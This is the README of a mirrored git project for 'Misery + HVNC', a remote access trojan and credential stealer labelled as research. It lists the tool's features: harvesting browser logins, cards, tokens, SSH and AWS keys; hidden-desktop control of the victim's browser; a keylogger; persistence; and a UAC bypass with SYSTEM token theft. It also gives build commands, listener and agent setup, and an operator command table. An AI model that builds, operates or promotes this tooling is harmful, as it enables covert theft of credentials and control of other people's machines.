mirror of
https://git.churchofmalware.org/JYenn/Misery
synced 2026-09-22 05:27:07 +00:00
38990e708d5bb2212ed1edf2eb6eb584ea96161d
Misery + HVNC
a devoted sister of the Church of Malware
HVNC RAT and stealer research project, derived from Misery. For local testing and research only.
Features
- Hidden desktop (
hvnc start): GDI apps on a hidden desktop, streamed live - Interactive browser (
hvnc launch chrome): real Chromium with the victim's logins, driven over CDP - Ghosted browser (
ghost <url>): hidden Chrome/Edge session using the victim's cookies and logins - Credential harvesting: Chrome, Edge, Brave, Opera, Opera GX, Firefox
- App-session harvesting: payment cards, Discord, Steam, Telegram, Slack, VS Code, AWS, SSH keys, Wi-Fi passwords, wallet extension paths, Signal session listing
- Encrypted C2 channel: reverse TCP (default) or HTTPS beaconing through a CDN
- Keylogger and clipboard monitoring
- Persistence: HKCU Run key and WMI event subscriptions
- Elevation (
elevate): silent UAC bypass to High via PEB masquerade and CMSTPLUA/ICMLuaUtil, then SYSTEM through SeDebug token theft from a non-PPL system process. Verified on Windows 11 25H2 (build 26200) - Anti-analysis: user-mode environment checks, reflective injection
VirusTotal
Quick start
setup.py writes src/config.h, saves the console's ECDH key to .misery_key, and builds the project:
python setup.py -g # interactive
python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -o agent # non-interactive
Run the console listener, then the agent:
.\build\console.exe
.\build\agent.exe
Type help in the console for the full command list.
Commands
| Command | What it does |
|---|---|
steal |
run credential and session harvesting |
elevate |
silently relaunch the agent as admin; the new instance registers as elevated |
hvnc start / hvnc stop |
start or stop the hidden desktop session |
hvnc launch [path] |
launch an app (default Chrome) on the hidden desktop |
hvnc quality [10-100] |
set streamed frame JPEG quality |
ghost <url> |
open a URL in a ghosted hidden browser |
ghost nav <url> |
navigate the ghost browser |
ghost stop |
stop the ghost session |
keylog |
toggle the keylogger |
clip |
read the victim's clipboard |
clear / exit |
clear the terminal / quit |
Build
Requires cmake and a C++ toolchain (MSVC, MinGW, or Clang).
MSVC:
cmake -S . -B build -G "Visual Studio 17 2022" -A x64
cmake --build build --config Release
MinGW:
cmake -S . -B build -G "MinGW Makefiles" -DCMAKE_BUILD_TYPE=Release
cmake --build build -j 4
A fresh checkout builds against 127.0.0.1:4444. Run setup.py once so .misery_key exists.
Layout
src/agent: entry, C2 client, injector, persistencesrc/console: operator console + listenersrc/payload: payload DLL, reflective loader, trampolinesrc/stealer: Misery-derived sourcessrc/hvnc: hidden-desktop sessionsrc/ghost: ghosted browser sessionsrc/browser: CDP client (Page/Input over WebSocket)src/rat: keylogger + clipboardsrc/transport: encrypted TCP framing, HTTPS beacon carrier, compressionsrc/evasion: indirect syscalls, anti-analysis, UAC/token elevation, helpersbuild/: out-of-source build dir
Licence
No licence granted. Research code for study only; not licensed for redistribution or commercial use.
Languages
C++
87.5%
Python
10.5%
CMake
0.9%
Assembly
0.8%
C
0.3%

